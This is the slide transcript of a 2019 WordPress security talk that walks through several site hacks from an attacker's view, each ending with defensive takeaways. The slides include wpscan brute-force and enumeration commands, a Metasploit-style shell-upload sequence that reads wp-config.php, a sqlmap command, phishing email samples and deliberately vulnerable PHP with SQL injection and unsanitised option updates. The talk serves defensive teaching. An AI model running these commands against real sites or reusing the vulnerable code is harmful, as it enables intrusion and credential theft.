Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Come to the dark side, they have cookies

744d1f74b6e2daa8264d70c4ed395663?s=47 Tim Nash
April 06, 2019

Come to the dark side, they have cookies

Everyone should be a little bit worried about the security of their site, and at conferences, lots of security talks focus on practical steps people can take.

In this talk, Tim will flip the norms and instead focus on several real examples of sites being hacked but from the attackers perspective. We will see the whole attacks from the bad actors view identifying targets, analysing vulnerable sites, adding payload, exploiting in doing so showing how sites are infected, how some tools do prevent certain attacks and how clever and indeed not so clever bad actors can circumvent lots of hardening done.

Each step we can analyse what could have been put in place to prevent and frustrate the attack and then look at how this can be implemented on your site.

744d1f74b6e2daa8264d70c4ed395663?s=128

Tim Nash

April 06, 2019
Tweet

Transcript

  1. TIM NASH @tnash Come to the dark side They have

    cookies...
  2. What's the worst that can happen?

  3. None
  4. None
  5. None
  6. Client email Hi, we are going to be on the

    One Show in about two hours. Do you need to do anything?
  7. ruby wpscan.rb --url

  8. Intelligence gathering is fun!

  9. None
  10. function df_save_options() { $fields = $_REQUEST; foreach($fields as $key =>

    $field) { if($key!="action") { echo $key."-".$field; update_option($key,$field); } } die(); } Totally legit...
  11. None
  12. None
  13. WordPress Platform Lead 
 at 34SP.com Former Pen Tester co-run

    WordPress Leeds Ran a small dev agency Speaks about security 
 around the country
  14. Take aways from TV wonder Use a child theme Regularly

    code audit Have control of your WAF Get a disaster plan in place
  15. Magazine Hack

  16. Small print firm moved online Mom and Pop shop
 Uses

    a single WordPress site Shared hosting
 No in house "dev" team
  17. ruby wpscan.rb --url magazine-company.com 
 --wordlist timspassword.dict --username admin

  18. ruby wpscan.rb --url magazine-company.com 
 --enumerate p

  19. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up

    to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/ readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/ changelog.txt
  20. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up

    to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/ readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/ changelog.txt
  21. None
  22. /wp/wp-json/v2/users

  23. None
  24. 6eefb55db48f21dde991e2694dda58fd 
 ==
 tim.nash@34sp.com ???

  25. Typical WordPress update email

  26. Please update your site at timstest.ismysite.co.uk to WordPress 4.9.7. Updating

    with Jetpack installed is easy and only takes a few moments: https://jetpack-wordpress.com/update/ timstest.isymsite.co.uk If you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help. https://wordpress.org/support/ Keeping your site updated is important for security. It also makes the internet a safer place for you and your readers. The WordPress Team
  27. Friendly familiar login.... Pre populated username whats
 missing?

  28. The actual wp.com login

  29. >> From: WordPress.com <info@xxx.com> >> Date: 21 September 2018 at

    05:18:53 BST >> To: xxxx@xxxxxxxxxxxxxxxx.co.uk >> Subject: wordpress database upgrade required ! >> >> >> >> DataBase Upgrade Required >> >> Dear Customer, >> >> Your WordPress database is out-of-date, and must be upgrade before 29/09/2018. >> >> The upgrade process may take a while, so please be patient. >> >> Click here to Upgrade Wordpress >> >> >> Download our free mobile app today. >> View stats, moderate comments, create and edit posts, and upload media. >> Click here to learn more. >> Automattic Inc. | 60 29th St. #343, San Francisco, CA 94110
  30. Take aways from our spear phishing attack Never click untrusted

    links Enable two-factor authentication Limit administrator users Don't use the same password on ever site
  31. None
  32. Charity Hack

  33. Watford Children Charity Separated Brochure site Sharepoint/Exchange Server on site

    IT Manager 3rd party developers for site
  34. None
  35. use exploit/shell/divi_revslider_shell_upload
 set watfordcharity.com
 set payload exec
 set cmd cat

    wp-config.php
  36. <?php .... // ** MySQL settings ** // /** The

    name of the database for WordPress */ define( 'DB_NAME', 'watford' ); /** MySQL database username */ define( 'DB_USER', 'watford' ); /** MySQL database password */ define( 'DB_PASSWORD', 'totallysecure' ); /** MySQL hostname */ define( 'DB_HOST', 'db.watfordcharity.com' );
  37. set cmd "ls wp-content/plugins"

  38. What's the worst that can happen?

  39. What's the worst that can happen?

  40. None
  41. Take aways from our slider attack Always keep things up

    to date Never rely on themes licenses to get bundled plugins The DB is not a safe place to store credentials
  42. E-Commerce Site Hack

  43. E-commerce site hack WooCommerce Powered Hop 100s of customers Small

    Dev Team Custom Theme and a range of plugins
  44. https:// ecommerceexample.com/ wp-content/themes/custom/ dcss.php?id=1

  45. python sqlmap.py -u https:// ecommerceexample.com/ wp-content/themes/custom/ dcss.php?id=1

  46. <?php .... define('SHORTINIT', true); // load minimal WordPress require_once '../../../wp-load.php';

    // WordPress loader
  47. <?php .... $result = $wpdb->query("SELECT * FROM `{$tablename}` where `css_source`={$id}");

  48. <?php .... $id = $_GET['ID']

  49. Take aways from our SQL attack Custom Code is our

    responsibility Never Rely on a WAF thats in the application Always check endpoints for SQL injections
  50. Poisoning the well Small blogger Running WordPress the first time

    Get's supports mainly from Facebook forums
  51. Without trust we can't have security...

  52. Take aways from our poison well If someone says there

    an issue, DO NOT DISMISS IT Help people to understand security Security is everyone responsibility
  53. Security is your responsibility

  54. A bad actor needs to be right once....

  55. We need to be right all the time!

  56. TIM NASH @tnash | timnash.co.uk/security Thank you very much!